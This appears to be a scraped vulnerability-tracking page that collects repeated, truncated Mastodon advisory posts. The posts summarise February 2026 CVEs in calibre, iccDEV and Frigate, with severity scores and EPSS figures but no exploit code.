🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25636
(0 None)

EPSS: 0.01%

3 posts

N/A

thehackerwire@mastodon.social at 2026-02-06T21:57:14.000Z ##

🟠 CVE-2026-25636 - High (8.2)

calibre is an e-book manager. In 9.1.0 and earlier, a path traversal vulnerability in Calibre's EPUB conversion allows a malicious EPUB file to corrupt arbitrary existing files writable by the Calibre process. During conversion, Calibre resolves C...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-06T21:21:17.000Z ##

🟠 CVE-2026-25636 - High (8.2)

calibre is an e-book manager. In 9.1.0 and earlier, a path traversal vulnerability in Calibre's EPUB conversion allows a malicious EPUB file to corrupt arbitrary existing files writable by the Calibre process. During conversion, Calibre resolves C...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-06T21:18:28.000Z ##

🟠 CVE-2026-25636 - High (8.2)

calibre is an e-book manager. In 9.1.0 and earlier, a path traversal vulnerability in Calibre's EPUB conversion allows a malicious EPUB file to corrupt arbitrary existing files writable by the Calibre process. During conversion, Calibre resolves C...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25635
(0 None)

EPSS: 0.05%

3 posts

N/A

thehackerwire@mastodon.social at 2026-02-06T21:57:03.000Z ##

🟠 CVE-2026-25635 - High (8.6)

calibre is an e-book manager. Prior to 9.2.0, Calibre's CHM reader contains a path traversal vulnerability that allows arbitrary file writes anywhere the user has write permissions. On Windows (haven't tested on other OS's), this can lead to Remot...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-06T21:21:06.000Z ##

🟠 CVE-2026-25635 - High (8.6)

calibre is an e-book manager. Prior to 9.2.0, Calibre's CHM reader contains a path traversal vulnerability that allows arbitrary file writes anywhere the user has write permissions. On Windows (haven't tested on other OS's), this can lead to Remot...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-06T21:18:24.000Z ##

🟠 CVE-2026-25635 - High (8.6)

calibre is an e-book manager. Prior to 9.2.0, Calibre's CHM reader contains a path traversal vulnerability that allows arbitrary file writes anywhere the user has write permissions. On Windows (haven't tested on other OS's), this can lead to Remot...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25634
(0 None)

EPSS: 0.01%

3 posts

N/A

thehackerwire@mastodon.social at 2026-02-06T21:56:53.000Z ##

🟠 CVE-2026-25634 - High (7.8)

iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to 2.3.1.4, SrcPixel and DestPixel stack buffers overlap in CIccTagMultiProcessElement::Apply() int ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-06T21:20:57.000Z ##

🟠 CVE-2026-25634 - High (7.8)

iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to 2.3.1.4, SrcPixel and DestPixel stack buffers overlap in CIccTagMultiProcessElement::Apply() int ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-06T21:17:58.000Z ##

🟠 CVE-2026-25634 - High (7.8)

iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to 2.3.1.4, SrcPixel and DestPixel stack buffers overlap in CIccTagMultiProcessElement::Apply() int ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25731
(0 None)

EPSS: 0.01%

2 posts

N/A

1 repos

https://github.com/dxlerYT/CVE-2026-25731

thehackerwire@mastodon.social at 2026-02-06T21:19:42.000Z ##

🟠 CVE-2026-25731 - High (7.8)

calibre is an e-book manager. Prior to 9.2.0, a Server-Side Template Injection (SSTI) vulnerability in Calibre's Templite templating engine allows arbitrary code execution when a user converts an ebook using a malicious custom template file via th...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-06T21:17:36.000Z ##

🟠 CVE-2026-25731 - High (7.8)

calibre is an e-book manager. Prior to 9.2.0, a Server-Side Template Injection (SSTI) vulnerability in Calibre's Templite templating engine allows arbitrary code execution when a user converts an ebook using a malicious custom template file via th...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-06T20:18:55.000Z ##

🔴 CVE-2026-25643 - Critical (9.1)

Frigate is a network video recorder (NVR) with realtime local object detection for IP cameras. Prior to 0.16.4, a critical Remote Command Execution (RCE) vulnerability has been identified in the Frigate integration with go2rtc. The application doe...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-06T20:17:41.000Z ##

🔴 CVE-2026-25643 - Critical (9.1)

Frigate is a network video recorder (NVR) with realtime local object detection for IP cameras. Prior to 0.16.4, a critical Remote Command Execution (RCE) vulnerability has been identified in the Frigate integration with go2rtc. The application doe...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

Visit counter For Websites